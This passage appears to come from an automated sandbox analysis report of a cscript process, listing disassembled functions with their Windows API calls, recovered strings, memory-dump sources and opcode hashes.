                                                                            • Opcode Fuzzy Hash: ed69ad2fcdc96c8bc07700a07d81ce56b0b962bc68eea9562263ba8841fe5a4e
                                                                            • Instruction Fuzzy Hash: 0A412BB6D013299BCB21CF99C8806DEBBB4BF48710F21422ED945BB380D778AD458B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0071784A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegSetValueExW.ADVAPI32(?,Timeout,00000000,00000004,?,00000004,?,?,?,0070F129), ref: 0071787B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,00000000,00000000,00000000,00000000,?,?,?,0070F129), ref: 00717892
                                                                            • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 0071789F
                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,00000004,?,?,?,0070F129), ref: 007178D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: Value$ByteCharErrorLastMultiWide
                                                                            • String ID: Timeout
                                                                            • API String ID: 1054387349-1325157390
                                                                            • Opcode ID: 13e5a4cf8a0ba38308403809a1f11c0c71246a55fa6de7ecfb275cd8edb8f162
                                                                            • Instruction ID: 6748a156619ee79223662ded4b32ce3ffa06f44b0546a693398d813675ddde75
                                                                            • Opcode Fuzzy Hash: 13e5a4cf8a0ba38308403809a1f11c0c71246a55fa6de7ecfb275cd8edb8f162
                                                                            • Instruction Fuzzy Hash: F611E170A05214BBD724ABAE8C4DFEB7F7CDF467A0F108124B615D61D0EA789940C7B5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F4B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction ID: c5f5d954d1de045f0cac52af107a9dc8d764955e2ee1f77ae8dece71a50b95b9
                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction Fuzzy Hash: 58818F70E052499AEF248F68C8917FEBFA2AFC5320F184659D851A7292DF34F843CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00708070 Relevance: 7.6, APIs: 5, Instructions: 97registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 007080BD
                                                                            • __alloca_probe_16.LIBCMT ref: 007103EF
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00710407
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0071043D
                                                                            • GetLastError.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0071044B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$ByteCharErrorLastMultiWide__alloca_probe_16
                                                                            • String ID:
                                                                            • API String ID: 3112009249-0
                                                                            • Opcode ID: d3e825a1d5db269f3912ed4496fcf86450287093b39366bc62dd36997fdce2c0
                                                                            • Instruction ID: 4918bd1f0e6833eb9f77be3073c493109a08fd29bc8f12ade0c7834524a94a24
                                                                            • Opcode Fuzzy Hash: d3e825a1d5db269f3912ed4496fcf86450287093b39366bc62dd36997fdce2c0
                                                                            • Instruction Fuzzy Hash: 8931D831A0011CFBDB209B589C85BEE77F8EB54320F10C256FA51DB1D1DA79DD848756
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F2F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F702E7
                                                                            • RTL: Re-Waiting, xrefs: 04F7031E
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F702BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: a8f0025e9f5544c4a1e75ec6ddf6a6e9b01c0487d0c7588e280e78e92db9158d
                                                                            • Instruction ID: 299d10e5af445d851c996a071ba75f07eb2a20ed0eb85f77316d802bcd85f076
                                                                            • Opcode Fuzzy Hash: a8f0025e9f5544c4a1e75ec6ddf6a6e9b01c0487d0c7588e280e78e92db9158d
                                                                            • Instruction Fuzzy Hash: 43E1AE31A147419FD724CF28C984B2ABBF0EF88714F140A6DF5958B2D0DB78E946DB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00707030 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy_s
                                                                            • String ID: WSH
                                                                            • API String ID: 4009619764-2133009938
                                                                            • Opcode ID: 61d8768aacb2f4ffd7156f8bfb83dedcbf558c21e0c5a386ab2030fef6c8eda6
                                                                            • Instruction ID: 5c02af7eb9c41565a9c28d269241a063c0e361dcd7a9a9218f8ea182b135a264
                                                                            • Opcode Fuzzy Hash: 61d8768aacb2f4ffd7156f8bfb83dedcbf558c21e0c5a386ab2030fef6c8eda6
                                                                            • Instruction Fuzzy Hash: 015139B0A00219DBDB28DB18CC99BFA73E9FB44314F148659E906873C1EB3DAD41C7A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F3BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04F77B7F
                                                                            • RTL: Re-Waiting, xrefs: 04F77BAC
                                                                            • RTL: Resource at %p, xrefs: 04F77B8E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: 48213870598638b72c2cd99e3b3a8e0f3e87d4102032ad16c84dda240ec9096f
                                                                            • Instruction ID: 3cf301ac26ee8cbed9dcba315e6cc876be0975c1f525fdbf769ca3c325edd59f
                                                                            • Opcode Fuzzy Hash: 48213870598638b72c2cd99e3b3a8e0f3e87d4102032ad16c84dda240ec9096f
                                                                            • Instruction Fuzzy Hash: FE41D1317007029FD724EE29CC50B6AB7E5EF88726F000A1DF95A9B281DB30F4068B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F3B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F7728C
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 04F772C1
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04F77294
                                                                            • RTL: Resource at %p, xrefs: 04F772A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: 73350587d3fcbcc9fca4238c35308e0d99e0f122f13770f29addafaa205ee14a
                                                                            • Instruction ID: 4f2d7a49924c2de640d5942427ca4e8034d6f02952027559a5b39fbbfcf2a908
                                                                            • Opcode Fuzzy Hash: 73350587d3fcbcc9fca4238c35308e0d99e0f122f13770f29addafaa205ee14a
                                                                            • Instruction Fuzzy Hash: DC41A032B00206ABD720EE25CC41B66B7E5FB85715F100619FA55AB281DB25F853CBD5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04FB2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 2cbdf6d5b432609fa27762339d3f2146ce10b52ecff531c019fad2a28c4f35ec
                                                                            • Instruction ID: 3338f5e19b78f097ebc38f42f3eaeafab677433238ac0f0410e410d872a5206e
                                                                            • Opcode Fuzzy Hash: 2cbdf6d5b432609fa27762339d3f2146ce10b52ecff531c019fad2a28c4f35ec
                                                                            • Instruction Fuzzy Hash: B4318672A002199FDB20DF29DC44BEE77B8EF45710F490595E889E3240EB30BA468FA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F47D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                            • Instruction ID: d793b98e33d4a0bab2d791e7bb82186c20e3b223a2dcbc93cfb97e64d3bc8fe7
                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                            • Instruction Fuzzy Hash: 4C919371E002169BDB24EE69C8806BEBFF5EFC4360F54461AE855E72C0EF34B9428760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F09126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: 773be84fba356b9f62a6318925dc3092ffdd6198b17723da6dc3b3b3207f0c88
                                                                            • Instruction ID: b458aa1daed29ecdaed4be9256944f32fa0c0231229f96339a003a0682214c41
                                                                            • Opcode Fuzzy Hash: 773be84fba356b9f62a6318925dc3092ffdd6198b17723da6dc3b3b3207f0c88
                                                                            • Instruction Fuzzy Hash: 9D812EB1D012699BDB31DF54CC44BEEB7B4AF48714F0141EAA909B7280E7706E85DFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%